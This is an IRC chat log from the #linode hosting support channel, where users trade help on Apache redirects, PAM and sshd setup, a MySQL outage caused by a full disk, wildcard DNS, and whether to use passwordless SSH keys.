16:28<karanlyons>ramden: You'll also need to make sure your domain is in Linode's DNS manager.
16:29<ramden>i try it
16:29<ramden>#thanks
16:29-!-p3rsist [~dannyf@modemcable251.101-23-96.mc.videotron.ca] has joined #linode
16:30<maushu>karanlyons, with pam how do I prevent all logins, do you know? For testing.
16:31-!-niemeyer [~niemeyer@72-254-15-217.client.stsn.net] has joined #linode
16:33<karanlyons>maushu: http://p.linode.com/5613
16:34<maushu>Oh. Hostkey.
16:34<maushu>Oops.
16:34-!-ramden [~4def057c@chat.linode.com] has quit [Quit: CGI:IRC (Ping timeout)]
16:36-!-andrew [~andrew@70.134.98.138] has joined #linode
16:36<karanlyons>If you want to disable logins at PAM, you could uncomment the pam_access.so line in /etc/pam.d/sshd and then edit /etc/security/access.conf appropriately.
16:36<tunabananas>I am trying to get banqdesign.com to redirect to lookgoodonthe.net, on which I have a Wordpress Multisite install. I've set the vhost file for banqdesign.com to point to the DocumentRoot at /srv/www/lookgoodonthe.net and have added www.banqdesign.com as a ServerAlias in lookgoodonthe.net's vhost file
16:37<tunabananas>Would anyone have a suggestion as to a step I may be missing? Thank you!
16:37<karanlyons>maushu: Make sure all references point to the other sshd as well, including stuff like pidfiles.
16:38<maushu>Don't have to worry about that much, I'm using upstart.
16:38<maushu>(And dear god, it's awesome.)
16:39<maushu>karanlyons, if I screw up with pam, can I get locked out from local logins?
16:39<karanlyons>maushu: I'm actually not sure. I don't know if lish still functions in that case.
16:40<maushu>I'm running this on a vm first, but it's equivalent.
16:41-!-samrose [~samrose@c-24-23-77-168.hsd1.mi.comcast.net] has joined #linode
16:41<karanlyons>tunabananas: Don't you just want a Redirect rule?
16:41*karanlyons hasn't used Apache in the longest time.
16:42<maushu>nginx?
16:42<karanlyons>Yup.
16:42-!-linville [~linville@sapphire.tuxdriver.com] has quit [Quit: Leaving]
16:43-!-DarkG [~DG@host86-175-32-206.wlms-broadband.com] has quit [Read error: Connection reset by peer]
16:44-!-samrose [~samrose@c-24-23-77-168.hsd1.mi.comcast.net] has quit []
16:44-!-DarkG [~DG@host86-175-32-206.wlms-broadband.com] has joined #linode
16:44-!-samrose [~samrose@c-24-23-77-168.hsd1.mi.comcast.net] has joined #linode
16:45<tunabananas>I just want banqdesign.com to go to lookgoodonthe.net, yes
16:47<tunabananas>admittedly i'm a newb, just started learning linux 4 months ago
16:49<tunabananas>so i would add a RewriteRule in my .htaccess file in /srv/www/lookgoodonthe.net/?
16:50<karanlyons>tunabananas: Something like this: http://p.linode.com/5614
16:51-!-Antwan [~Antwan@adsl-98-77-201-71.mia.bellsouth.net] has quit [Quit: Antwan]
16:52<karanlyons>That might not be the best way to do it, but it's the way I remember.
16:53<bencaron>how should I upload an environment created from ruby DSL to my chef server?
16:54<bencaron>the docs says rake install, but this does not touch the env for me, only roles and cookbooks
16:54<bencaron>oh, sorry, just realized I'm not posting to the right window... :D
16:54<bencaron>well, if somebody know the answer anyway... feel free
16:56<tunabananas>it's banQ with a q - but thanks! still acting janky tho :/
16:56<tunabananas>banqdesign.com
16:57<tunabananas>i added the rewrite rule to /srv/www/lookgoodonthe.net/public_html/.htaccess
16:58<karanlyons>You want that .htaccess file to be at banqdesign.com.
16:59-!-orudie [~paul@ool-4b7f8ec4.static.optonline.net] has quit [Quit: бэм бэм бэм бэм бэм бэм бэм бля !]
16:59<karanlyons>So either have the old domain point to /srv/www/lookgoodonthe.net/public_html/, or have it point to /srv/www/banqdesign.com/public_html/ and put your .htaccess there.
16:59-!-warren [~warren@cpe-76-93-222-127.hawaii.res.rr.com] has joined #linode
17:00<karanlyons>Also, make sure your .htaccess isn't publically accessible (meaning banqdesign.com/.htaccess shouldn't let you see the file).
17:00-!-bencaron [~benoit@68.67.52.162] has quit [Read error: Operation timed out]
17:01<Bullrush>what's so great about nginx?
17:02<Karrde>it's not apache
17:02<Bullrush>:-)
17:02<karanlyons>Bullrush: It's faster, it has a lower memory footprint, I find the confs much nicer to edit.
17:02-!-redgore [~redgore@109.224.135.123] has joined #linode
17:03<Bullrush>Less docs available though
17:03<Bullrush>Any down sides?
17:03<karanlyons>Yeah, but it's not that difficult to learn from the official docs.
17:03-!-joey6 [~joey@ool-44c4f3a6.dyn.optonline.net] has joined #linode
17:03<joey6>can u purchase just a RAM upgrade?
17:04<karanlyons>joe6: Yes.
17:04<joey6>is there a page for the pricing scheme of that
17:04<@Perihelion>!extras
17:04<+linbot>Available extras: Disk: $ 1 per 1GB/month. RAM: $ 5 per 90MB/month. Transfer: $ 10 per 100GB/month. IPv4 addresses: $ 1 per address/month. To add extras, visit the Extras tab on a Linode.
17:04<karanlyons>Bullrush: I struggle to think of one for the majority of uses. Unlike apache, nginx doesn't spawn a full environment (this is not the right word) for each process, so there can be some downsides there.
17:05<karanlyons>Perihelion: Didn't know that one, I was signing into linode to look up the page :D
17:05<@Perihelion>:P
17:05<joey6>thanks
17:05<@Perihelion>I have food in my hand otherwise I'd be more social about it :<
17:05*Perihelion shares nachos
17:05*karanlyons grabs some.
17:06-!-joey6 [~joey@ool-44c4f3a6.dyn.optonline.net] has quit []
17:07-!-wt3c [~carlos@mvx-200-196-57-166.mundivox.com] has quit [Quit: Saindo]
17:07<Bullrush>karanlyons: I think I get the idea. Simple round robin select() instead of threads- plenty faster without context switching. I'm a bit concerned about a few things though. Also doesn't help if the app server & rdbms is threaded anyway.
17:07<karanlyons>Bullrush: What are your concerns?
17:08<karanlyons>(Honestly, the best way to know if it's better for you is to test it. Hard data will pretty much always beat conjecture)
17:08<maushu>*sigh* This is so much work.
17:08-!-pigdude [~tallen@gateway1.atlantic-media.us] has quit [Ping timeout: 480 seconds]
17:09<karanlyons>maushu: Do you have the second sshd running yet?
17:09<maushu>Yes, but now pam is giving me trouble.
17:09<Bullrush>karanlyons: I suppose I'll just try it out eventually. Just thought to short circuit a potential disaster by asking first
17:09-!-logichole [~james@c-98-247-99-60.hsd1.wa.comcast.net] has joined #linode
17:11<karanlyons>Bullrush: Regardless of a threaded app/rdbms, it'll probably handle your static files much faster and concurrently.
17:11<Bullrush>karanlyons: Probably right. Less RAM/CPU usage from the web server means more to go around
17:12<karanlyons>The biggest win really is the decreased RAM usage, given that RAM is a precious commodity on shared hosts.
17:13<Bullrush>karanlyons: Absolutely concur on that last
17:13<maushu>Testing to see if pam is running the script...
17:14<Bullrush>karanlyons: I'll give it a shot (not tonight though); thanks for the tips
17:14<karanlyons>No problem.
17:14-!-warren [~warren@cpe-76-93-222-127.hawaii.res.rr.com] has quit [Read error: Connection reset by peer]
17:15-!-oeuftete [~oeuftete@142.68.81.17] has joined #linode
17:16-!-lunks [~lunks@189.63.138.62] has quit [Quit: lunks]
17:16-!-kenichi [~kenichi@c-24-20-239-11.hsd1.or.comcast.net] has quit [Read error: Connection reset by peer]
17:16-!-kenichi [~kenichi@c-24-20-239-11.hsd1.or.comcast.net] has joined #linode
17:16-!-quicksketch [~quicksket@208.73.113.6] has quit [Quit: quicksketch]
17:17-!-Bullrush [~paul@dsl-242-162-205.telkomadsl.co.za] has left #linode []
17:17-!-leif [~leifkb@defiant.ecritters.biz] has quit [Ping timeout: 480 seconds]
17:18<maushu>I have no idea what I'm doing.
17:18<Musfuut>Everyone goes though that point the first time they learn something. :)
17:19-!-gadams [~IAmMrAwes@static-72-248-178-82.mas.onecommunications.net] has joined #linode
17:19<maushu>Well, I will just keep using my big mallet on it.
17:19<maushu>If it breaks, I just create another vm.
17:19<Musfuut>It's not the size of your mallet it is how you use it.
17:20<tunabananas>karanlyons: this is my vhost file for banqdesign.com:
17:20<tunabananas>#Options +FollowSymLinks
17:20<tunabananas>RewriteEngine on
17:20<tunabananas>RewriteCond %{HTTP_HOST} ^www.bangdesign.com$[OR]
17:20<tunabananas>RewriteCond %{HTTP_HOST} ^bangdesign.com$
17:20<tunabananas>RewriteRule ^(.*)$ http://lookgoodonthe.net/$1 [R=301,L]
17:20<tunabananas>oops
17:20<Daevien>Musfuut: sounds liek something someone with a small mallet would say
17:20<tunabananas>VirtualHost 173.255.251.182:80>
17:20<tunabananas> ServerAdmin admin@banqdesign.com
17:20<tunabananas> ServerName banqdesign.com
17:20<tunabananas> ServerAlias www.banqdesign.com *.banqdesign.com *.lookgoodonthe.net
17:20<tunabananas> DocumentRoot /srv/www/lookgoodonthe.net/public_html/
17:20<tunabananas> ErrorLog /srv/www/lookgoodonthe.net/logs/error.log
17:20<tunabananas> CustomLog /srv/www/lookgoodonthe.net/logs/access.log combined
17:20<tunabananas></VirtualHost>
17:20<Daevien>tunabananas: stop
17:20<Daevien>!p
17:20<+linbot>http://p.linode.com <-- paste here, not in the channel
17:20<karanlyons>tunabananas: In the future, use p.linode.com
17:20-!-smed [~smed@ool-4353493d.dyn.optonline.net] has quit [Read error: Connection reset by peer]
17:21<tunabananas>ah - sorry!
17:21-!-smed [~smed@ool-4353493d.dyn.optonline.net] has joined #linode
17:21<Musfuut>Daevien: Perhaps a small mallet but a very large toolbox.
17:22<gawry>Did anyone installed Zabbix and ISPConfig?
17:23-!-redgore [~redgore@109.224.135.123] has quit [Quit: Leaving]
17:23<tunabananas>http://p.linode.com/5615
17:23<maushu>Why... why... why did you close putty?! Don't go! COME BACK!
17:24<karanlyons>tunabananas: You can add a redirect permanent / lookgoodonthe.net in your vhost, though that'll only redirect the root I think. Maybe someone with more Apache knowledge can give a better solution.
17:25-!-takamichi [Takamichi@c127-2.i07-32.onvol.net] has quit [Ping timeout: 480 seconds]
17:25-!-takamichi [Takamichi@c127-2.i07-32.onvol.net] has joined #linode
17:25<tunabananas>oh, that's not what i'm doing?
17:25<karanlyons>I think you'll want that redirect to be in it's own virtualhost to prevent recursion.
17:26<tunabananas>the vhost i pasted to you in from /etc/apache2/sites-available/banqdesign.com
17:26<maushu>"terminated with status 255" what the hell.
17:26<tunabananas>setting documentroot to /srv/www/lookgoodonthe.net
17:26<tunabananas>(/public_html)
17:26<nDuff>Hmm.
17:28<karanlyons>Try something like: http://p.linode.com/5616
17:28<karanlyons>I don't have a running copy of Apache anywhere, so I can't say with certainty that that works.
17:28<tunabananas>i'll try it out :)
17:29<karanlyons>Take out *.lookgoodonthe.net from your other virtualhost.
17:30<tunabananas>that's in there for wordpress multisite subdomains
17:30<tunabananas>that worked!
17:30<tunabananas>awesome
17:31<tunabananas>successfully redirecting at last, and that much more learned ;) thank you
17:31<karanlyons>No problem!
17:31-!-akerl [~Les@pool-70-109-61-224.clppva.fios.verizon.net] has joined #linode
17:32<karanlyons>Oh, my bad about lookgoodonthe.net, I mean the banqdesign ones. (I got your old and new domains mixed up).
17:32-!-Boohemian [~Boohemian@209-6-67-222.c3-0.abr-ubr1.sbo-abr.ma.cable.rcn.com] has quit [Read error: Connection reset by peer]
17:33<tunabananas>ah, take out the wildcard subdomain in banqdesign's vhost?
17:33-!-Boohemian [~Boohemian@209-6-67-222.c3-0.abr-ubr1.sbo-abr.ma.cable.rcn.com] has joined #linode
17:33<karanlyons>tunabananas: Well, in *.lookgoodonthe.net's. Since the banqdesign domain is getting redirected now.
17:34-!-Edgeman [~edgeman@216.8.148.221] has quit [Remote host closed the connection]
17:34<tunabananas>ahh, word, so that it looks like this:
17:34<tunabananas>http://p.linode.com/5617
17:35<karanlyons>Yup.
17:35<gadams>mysql on my ubuntu 10.04 box just died randomly and now won't start because it can't find the sock. :(
17:35<karanlyons>I don't know that having banqdesign domains there changes anything, but it makes your virtualhosts a little bit harder to understand, so you might as well remove them.
17:35<karanlyons>gadams: What error are you getting?
17:36<tunabananas>nice. like to have things clean :) you're awesome!
17:36<gadams>karanlyons, ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
17:37-!-techhelper1 [~techhelpe@pool-108-43-150-128.plspca.fios.verizon.net] has quit [Quit: Computer has gone to sleep.]
17:37<karanlyons>What does sudo find / | grep "sock" turn up?
17:37<@jed>find | grep :(
17:37-!-AviMarcus [~avi@bzq-79-183-184-15.red.bezeqint.net] has joined #linode
17:37<karanlyons>Actually, sudo find / -name "mysql.sock" should work.
17:38<karanlyons>jed: Yeah, that wasn't the best way to handle that search :(
17:38-!-Hellojere [~Hellojere@89.7.90.160] has quit [Remote host closed the connection]
17:40<karanlyons>gadams: Or sudo find / -name "mysqld.sock"
17:40<karanlyons>Pretty sure I got it right this time :P
17:41<akerl>What's the recommended way to find out what subset of IPs my ISP lives in? I have a dynamic IP, and I'm trying to use iptables to restrict access to 22 on my node.
17:42<karanlyons>Check to see if that returns a result, and if so, if that result is the same as the defined socket in /etc/mysql/my.cnf
17:43<gadams>Negative
17:43<gadams>nothing returns
17:43<Daevien>akerl: find the as number for your isp & see what they have allocated
17:44<akerl>gadams: You're trying to find your mysql socket?
17:44<Daevien>akerl: one easy way is to punch your ip into revip.info
17:44-!-techhelper1 [~techhelpe@pool-108-43-150-128.plspca.fios.verizon.net] has joined #linode
17:44<gadams>akerl, yeah mysql randomly died and can't be restarted
17:44<akerl>?
17:45<akerl>Randomly died? What do your logs say?
17:45<karanlyons>gadams: Is mysqld running?
17:45<gadams>negative
17:45<gadams>just rebooting the box real fast
17:45<akerl>Why do the logs say it died, and what is the error when you try to restart?
17:45<karanlyons>Is this error from mysqld or mysql? And what are your mysql logs like?
17:46-!-bbeausej [~Adium@mirage.turbulent.ca] has quit [Quit: Leaving.]
17:46<gadams>mysql start ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
17:46<gadams>Let me look at the logs
17:47<akerl>That's an error with connecting to the mysqld. I mean the error that the actual mysqld throws when you try to start it
17:47<karanlyons>mysql and mysqld are different things.
17:48-!-Edgeman [~edgeman@216.8.148.221] has joined #linode
17:49-!-stafamus [~stafamus@host-92-24-39-144.ppp.as43234.net] has quit [Ping timeout: 480 seconds]
17:49*gadams fml
17:49<gadams>Found the issue
17:49<karanlyons>gadams: What was it?
17:49<gadams>Misconfigured logrotate and deleting old logs.
17:49<gadams>Filled up all the space
17:50<karanlyons>You filled up your partition?
17:50<gadams>Yeah.
17:50<gadams>I'm going to go drown my self in shame
17:50<karanlyons>I would *not* have guessed that.
17:51<gadams>It hit me right after you said mysql and mysqld are different things
17:51<maushu>Well, its working, but after all of this, I don't think this is what I want.
17:51<maushu>*sigh*
17:51<gadams>I had to fix this issue for a client about a month ago
17:52-!-samrose [~samrose@c-24-23-77-168.hsd1.mi.comcast.net] has quit [Read error: Operation timed out]
17:53<maushu>All I wanted was to wrap a tcp server with ssh. It's arriving the point that I might as well implement the ssh protocol from scratch. :(
17:53<gadams>karanlyons, thanks
17:53<gadams>akerl, thank you sir
17:54<akerl>maushu: What are you trying to accomplish
17:54-!-gadams [~IAmMrAwes@static-72-248-178-82.mas.onecommunications.net] has quit [Quit: Leaving]
17:54-!-samrose [~samrose@c-24-23-77-168.hsd1.mi.comcast.net] has joined #linode
17:55<maushu>akerl, I have an telnet application, I want to use ssh instead of telnet.
17:56<Daevien>ew. telnet
17:56<maushu>Exactly.
17:56<karanlyons>gadams: Glad you got it working!
17:56<karanlyons>Daevien: Aw, don't hate on telnet.
17:56<Daevien>is it just you that connets to it? ie: setup ssh tunneling & only allow it to bind to 127.0.0.1
17:57<maushu>No, multiple users.
17:57<maushu>It has its own custom authentication.
17:57<Daevien>what are you using that needs telnet anyway? gotta be horrible software or older than some of the people here..
17:58-!-lsabota [~lukas@xannode.com] has quit [Quit: leaving]
17:58<maushu>It's an internal management app.
17:59<maushu>It's pretty decent, it only uses telnet. Not a good idea with public wireless and so.
17:59<Daevien>http://www.stunnel.org/ is what i can think of right off that might help
18:01-!-lsabota [~lukas@xannode.com] has joined #linode
18:02-!-lunks [~lunks@189.63.138.62] has joined #linode
18:02-!-karanlyons is now known as karanlyons|away
18:04<maushu>Hmm
18:06-!-pdx6_ [~pdx6@sublinear.net] has joined #linode
18:06-!-pdx6_ [~pdx6@sublinear.net] has quit []
18:07-!-pdx6 [~pdx6@sublinear.net] has joined #linode
18:07<pdx6>good afternoon
18:07<pdx6>could someone assist me in recovering/resetting my account?
18:07-!-burningdog [~roger@196-215-4-219.dynamic.isadsl.co.za] has quit [Quit: burningdog]
18:08<Kyhwana_>maushu: use stunnel
18:08<pdx6>I am not getting the password reset email for some reason
18:08<Daevien>pdx6: sometimes it takes a couple minutes . also, check your junk mail / spam mail just in case it ended up there
18:08<pdx6>ok, I'll give it another 10 and dig in the poo pile
18:09<Daevien>otherwise, you'll need to put in an email/call
18:09<Daevien>!ops
18:09<+linbot>Users with ops are employees of Linode, and know what they're talking about. The rest of us are the ever-so-helpful(?) community. Official Linode contact information: http://www.linode.com/about/
18:09<Daevien>contact info is there
18:09<pdx6>thanks
18:11<pdx6>ah, it got stuck in my gmail forward. Got it
18:11-!-sidney [~sidney@pool-74-109-20-70.phlapa.fios.verizon.net] has quit [Quit: Leaving...]
18:12-!-lunks [~lunks@189.63.138.62] has quit [Quit: lunks]
18:18-!-sidney [~sidney@pool-74-109-20-70.phlapa.fios.verizon.net] has joined #linode
18:19<EugeneKay>So, what's the holdup with getting IPv6 to London? Waiting on upstream plans, I'm guessing?
18:19<AviMarcus>always
18:19<AviMarcus>website says the vague "Q4 2011"
18:19<AviMarcus>since Linode has it in 3 datacenters, they must have all the config on their side done..
18:19<ajmitch>they need to find carrier pigeons that can carry the bigger packets
18:20-!-zeade [~Adium@c-98-248-222-200.hsd1.ca.comcast.net] has joined #linode
18:20-!-thingles [~thingles@64.244.57.226] has quit [Quit: Bye!]
18:20-!-sidney [~sidney@pool-74-109-20-70.phlapa.fios.verizon.net] has quit []
18:20-!-sidney [~sidney@pool-74-109-20-70.phlapa.fios.verizon.net] has joined #linode
18:24-!-tparker [~tparker@2600:3c03::1d:4242] has quit [Remote host closed the connection]
18:24<EugeneKay>Ah, an update to RFC1149
18:25-!-tparker [~tparker@2600:3c03::1d:4242] has joined #linode
18:27<AviMarcus>heh. "Nevertheless, for large transfers, avian carriers are capable of high average throughput when carrying flash memory devices. "
18:27<ajmitch>http://tools.ietf.org/html/rfc6214
18:33-!-lakin [~lakin@S0106000625f6ffa5.cg.shawcable.net] has joined #linode
18:34-!-karanlyons|away [~karanlyon@c-66-31-201-37.hsd1.ma.comcast.net] has quit [Quit: Bye!]
18:36-!-_eagle [~eag@sign.io] has joined #linode
18:36-!-lakin [~lakin@S0106000625f6ffa5.cg.shawcable.net] has quit []
18:40-!-techhelper1 [~techhelpe@pool-108-43-150-128.plspca.fios.verizon.net] has quit [Quit: Computer has gone to sleep.]
18:42-!-_eagle [~eag@sign.io] has left #linode []
18:42<EugeneKay>Flash memory doesn't count, it's not ethernet frames.
18:51-!-omy [~411cb997@chat.linode.com] has joined #linode
18:52<omy>Hey guys. Linode supports wildcard subdomains correct?
18:52-!-apsqwla [~apsqwla@96-32-64-176.dhcp.gwnt.ga.charter.com] has joined #linode
18:53-!-lunks [~lunks@189.6.143.177] has joined #linode
18:54<Kyhwana_>uh
18:54<Kyhwana_>that's not something that's up to linode
18:54<squircle>omy: yes, they do
18:54<squircle>Kyhwana_: DNS manager
18:54<Kyhwana_>ah right
18:55-!-ktabic [~ktabic@81.187.163.185] has quit [Quit: I'm a professionally trainined computer scientist. That is to say, I am poorly educated]
18:55-!-Cromulent [~Cromulent@cpc8-reig4-2-0-cust24.6-3.cable.virginmedia.com] has joined #linode
18:55<omy>thanks guys
18:57<omy>SO I would go into the DNS Manager and enter an A record for the wildcard subdomains like this correct?
18:57<omy>Hostname would be *
18:57<squircle>omy: yes
18:58<omy>Ip Address is 12.345.67.890 or whatever my host addy is
18:58<squircle>omy: yes
18:58<omy>ok thanks a million
18:58<omy>:)
18:58<squircle>:)
18:58-!-vraa [~vraa@c-76-30-144-32.hsd1.tx.comcast.net] has joined #linode
18:59-!-Internat [~nf@123-243-184-161.static.tpgi.com.au] has quit []
18:59<omy>squircle: Dop I need to create anything in Apache2?
18:59<omy>*DO
18:59-!-stephenplatz [~steve@71-32-90-206.tukw.qwest.net] has joined #linode
18:59<squircle>omy: well, if the domain name doesn't match an existing virtual host, it'll go to the default vhost
18:59<squircle>omy: so make sure you have something there
19:00<Kyhwana_>omy: don't forget the AAAA record!
19:00<squircle>omy: for example, blahblahblahblah12345.omy.com won't be in Apache's vhost list, so it'll go to the "default" vhost
19:00<omy>that's the first thing I did Kyhwana
19:00-!-jpg [~horizon@narbondel.org] has quit [Quit: leaving]
19:00-!-pr0tekk_ [~nuts@narbondel.org] has quit [Remote host closed the connection]
19:01<omy>squircle, I did change the alias of my domain in the httpd.config to *.yourdomain.com
19:01<omy>I believe that should do it
19:01<squircle>omy: then you're fine!
19:02<omy>thanks again :)
19:04-!-MacsFromGS [~MacsFromG@5adc1747.bb.sky.com] has quit [Ping timeout: 480 seconds]
19:10-!-karstensrage [~Adium@173-13-190-57-sfba.hfc.comcastbusiness.net] has joined #linode
19:10<karstensrage>hi
19:10<squircle>hi!
19:10<karstensrage>linodes are kind of like VM's right?
19:10<squircle>they are VM's
19:11-!-zeade [~Adium@c-98-248-222-200.hsd1.ca.comcast.net] has quit [Quit: Leaving.]
19:14<SirFunk>oo bold.. nice :-P
19:14<SirFunk>_bold_
19:14<SirFunk>nope
19:14<Kyhwana_>bold
19:14<squircle>bold
19:14-!-zeade [~Adium@c-98-248-222-200.hsd1.ca.comcast.net] has joined #linode
19:14<squircle>italics
19:14<SirFunk>how do you do it?!
19:14<squircle>magic!
19:14<SirFunk>i want magic!
19:14*SirFunk cries
19:15<Kyhwana_>Ctrl-B
19:15<SirFunk>bold
19:15<SirFunk>niiiice
19:15<karstensrage>so if by some bizarre coincidence there was some anomolous IO problem and I decided it was the VM not the stuff I was running on the VM, could linode see what was going on at that time?
19:16<squircle>karstensrage: you're always guaranteed a certain amount of I/O; how much you can use depends on how busy the host is
19:16<squircle>karstensrage: but if it became a huge gigantic problem (e.g. one node thrashing the disk 24/7), they'd be able to do something about it
19:16<Daevien>they could see on teh host side, not what your vm is doing. most likely though, it is something you are running. or the host in busy with other vm but thats not overly common, linode doesn't overload their servers like a lot of providers
19:17<squircle>what he said ^^
19:18<squircle>i've never personally run into a problem with I/O, and I don't think it's something that's too common
19:19-!-niemeyer [~niemeyer@72-254-15-217.client.stsn.net] has quit [Ping timeout: 480 seconds]
19:21-!-sidney [~sidney@pool-74-109-20-70.phlapa.fios.verizon.net] has quit [Quit: Leaving...]
19:21-!-techhelper1 [~techhelpe@user-0c9h7po.cable.mindspring.com] has joined #linode
19:22-!-Internat [~nf@123-243-184-161.static.tpgi.com.au] has joined #linode
19:24<karstensrage>Daevien: this is a hypothetical
19:25<karstensrage>im not running into a problem with linodes, im just wondering if there was a TOTALLY anomolous thing, could linode see more and help me identify *if* there was anything
19:25<omy>is there a way to reveal the .htaccess in the public_html folder?
19:25<AviMarcus>karstensrage, linode can do anything!
19:25<omy>the file I mean
19:25<squircle>omy: you mean allow access from the outside?
19:26<squircle>karstensrage: linode can't see inside your linode at all. ever. period.
19:26<EugeneKay>s/can't/doesn't/
19:26<karstensrage>thats not what im asking
19:26<karstensrage>im sorry
19:26-!-petemall [~petemall@99-99-38-103.lightspeed.sntcca.sbcglobal.net] has quit [Quit: petemall]
19:26<squircle>what are you asking?
19:26<omy>Squircle: I need to add some comments to my .htaccess file and I am using FIleZilla to access my hmtl_public folder on my domain....but I can not see the .htaccess file
19:26<squircle>omy: you have to tell filezilla to show hidden files
19:27<omy>ahok one sec
19:27<karstensrage>im asking if there was anomolous problem like the WHOLE linode thingamabob in which my particular linode was running, had a problem
19:27<karstensrage>could linode see that, where I obviously couldnt
19:27<squircle>karstensrage: if the HOST did, yes, they'd fix it
19:27<EugeneKay>karstensrage - there's the monitoring of the disk I/O, cpu, etc.... then there's whether your linode is up or not. That's about it.
19:28<karstensrage>but could the identify it from logs and correlate the problem im seeing with the time the issue arose in the outer linode
19:28<karstensrage>EugeneKay: disk, i/o, cpu of the whole linode thing, right?
19:28<karstensrage>i dont know what you call the machine, that has the little vm's on it
19:29<Daevien>the host
19:29<EugeneKay>Your Linode(noun) is a Xen VM / VPS, running on a Linode(brand) Host machinbe.
19:29<Daevien>(though tehcnically dom0 in xen terms, just hos tis what you are looking for)
19:29<Daevien>yes, of course they monitor the host
19:30-!-Edgeman [~edgeman@216.8.148.221] has quit [Remote host closed the connection]
19:30-!-petemall [~petemall@99-99-38-103.lightspeed.sntcca.sbcglobal.net] has joined #linode
19:30-!-jpg [~horizon@narbondel.org] has joined #linode
19:32<karstensrage>ok, so if i figured out a time, they could look at that time and see if the host was having problems or w/e
19:32<Daevien>look rather than asking 50 questions, how about describe yoru problem and what you've done to figure out what caused it?
19:33<karstensrage>im sorry, yes
19:33<karstensrage>the problem is that we saw a bunch of 504's on a service that is completely unreproducible, this was not with linode
19:34<Daevien>504 is related to your config. and linode cannot look at non linode servers
19:34<karstensrage>it all happened within a 3 second boundary
19:34-!-takamichi [Takamichi@c127-2.i07-32.onvol.net] has quit [Remote host closed the connection]
19:34<karstensrage>if the whole host had some problem and became i/o bound it could explain the anomoly
19:34<Daevien>504 specifically is gateway timeout i believe, so your php backend or cachign or somethign else liek that didnt' respond in the timeout of your web server
19:35*akerl wonders what the logs say
19:35<karstensrage>so i was wondering if *I* had that problem on a linode, and someone asked if there was a problem with the Host, could Linode help me answer that?
19:35<akerl>Linode is responsible for your hardware. If the host is up, the network is operational, and nothing is on fire, Linode is done.
19:35*Daevien sighs
19:36-!-Edgeman [~edgeman@216.8.148.221] has joined #linode
19:37<akerl>Linode is also responsible for your billing info, their website, and keeping heckman from blowing up anything important
19:37<omy>suircle: Enabled hidden files on Filezilla to no avail...perhaps because I am in sftp mode?
19:37<Daevien>karstensrage: linode monitors the host machine as akerl said: if the host machine is working and there is network conneciton, everythign else woudl be relating to your config which is what it sounds like: you run multiple vm, one of them that the others connect to, it had the problem for a short period of time and is most liekly related to your config otherwise it woudl have been longer outage
19:37<akerl>Anything not included in the my two above statements falls into the realm of "unmanaged hosting", which means you are in control, and while the community may be helpful, we are not required to be
19:38-!-zz_neilio [~neilio-2@67.222.1.128] has joined #linode
19:39-!-zz_neilio is now known as neilio
19:40<karstensrage>ok, i understand
19:40<karstensrage>thank you
19:40<karstensrage>im sorry to be so vague
19:40-!-sidney [~sidney@pool-74-109-20-70.phlapa.fios.verizon.net] has joined #linode
19:41-!-cereal is now known as cereal|Away
19:41-!-sidney [~sidney@pool-74-109-20-70.phlapa.fios.verizon.net] has quit []
19:42-!-sidney [~sidney@pool-74-109-20-70.phlapa.fios.verizon.net] has joined #linode
19:45-!-TIBS011 [~TIBS01@host-92-20-154-71.as13285.net] has quit [Ping timeout: 480 seconds]
19:45-!-TIBS011 [~TIBS01@178.101.214.253] has joined #linode
19:54-!-f8- [~buddyw@ninja.budw.net] has joined #linode
19:55-!-f8- is now known as buddyw
19:55<omy>Guys if showing hidden files in FIlezilla does not show the .htaccess file, than I can create one via the terminal correct?
19:55<Kyhwana_>yes
19:56<omy>thank you
19:56-!-heliosta_ [~heliostat@nat-204-14-239-211-sfo.net.salesforce.com] has quit [Remote host closed the connection]
19:56-!-Cromulent [~Cromulent@cpc8-reig4-2-0-cust24.6-3.cable.virginmedia.com] has quit [Remote host closed the connection]
20:08-!-hfb [~hfb@pool-96-247-53-174.lsanca.dsl-w.verizon.net] has quit [Quit: Leaving]
20:08-!-walterheck [~walterhec@78.180.87.129] has joined #linode
20:11-!-pdx6 [~pdx6@sublinear.net] has left #linode []
20:11-!-kenichi [~kenichi@c-24-20-239-11.hsd1.or.comcast.net] has quit [Read error: Connection reset by peer]
20:13<p3rsist>What do you guys think of password-less SSH keys in a production server?
20:14<apsqwla>depends how secure the keys are?
20:14<apsqwla>the id_rsa.pub
20:14<akerl>...
20:14<akerl>p3rsist: No.
20:15<akerl>apsqwla: What do you mean, how secure your public key is?
20:15<apsqwla>err
20:15<mikegrb_>lulz
20:15<apsqwla>not the pub lol
20:15<apsqwla>i meant the opposite i typed the wrong file
20:16<akerl>1) If you are using keys, you want strong passphrases on them. Period
20:16<akerl>2) If you are expecting keys to be more secure than passwords, you are incorrect.
20:16-!-neilio [~neilio-2@67.222.1.128] has quit [Remote host closed the connection]
20:16<akerl>The above are equally true for any system, production or otherwise
20:16-!-zz_neilio [~neilio-2@67.222.1.128] has joined #linode
20:17<apsqwla>what about any user?
20:17<akerl>What about what now?
20:17-!-zz_neilio is now known as neilio
20:17<apsqwla>you cant stop a user from using ssh keys
20:18<akerl>Yes you can…
20:18<akerl>KeyBasedAuthentication No
20:18<apsqwla>err yeah i guess that...but really?
20:18<akerl>I still have no idea what you're trying to articulate.
20:18-!-techhelper1 [~techhelpe@user-0c9h7po.cable.mindspring.com] has quit [Ping timeout: 480 seconds]
20:19<bob2>p3rsist: forcecommand
20:19<bob2>^ i use that with passwordless keys a reasonable amount
20:21-!-mathew [~mathew@cpc5-flit3-2-0-cust101.9-1.cable.virginmedia.com] has joined #linode
20:23<EugeneKay>The only place you should be using passwordless keys is with command=
20:23<EugeneKay>For cron jbo backups, etc
20:24<EugeneKay>Anythign else is.... daft.
20:25<apsqwla>what if the firewall only accepts connections from one ip
20:25-!-DephNet[Paul] [~Paul@95.172.231.221] has quit [Remote host closed the connection]
20:25<apsqwla>and its in a military base
20:26<EugeneKay>Then you need to get a GAO-approved security study done
20:26<EugeneKay>I'd estimate at least $50,000 in the budget for that
20:26<apsqwla>whats a budget?
20:26<p3rsist>so to access my linodes... you don't recommand me ssh keys...
20:27<apsqwla>p3rsist, not if your private key is not on a chip in your wrist
20:27<akerl>p3rsist: I'd honestly recommend strong password + google 2 factor auth
20:27<EugeneKay>SSH keys are great, so long as your private key has a password on it.
20:27<akerl>EugeneKay: That is false.
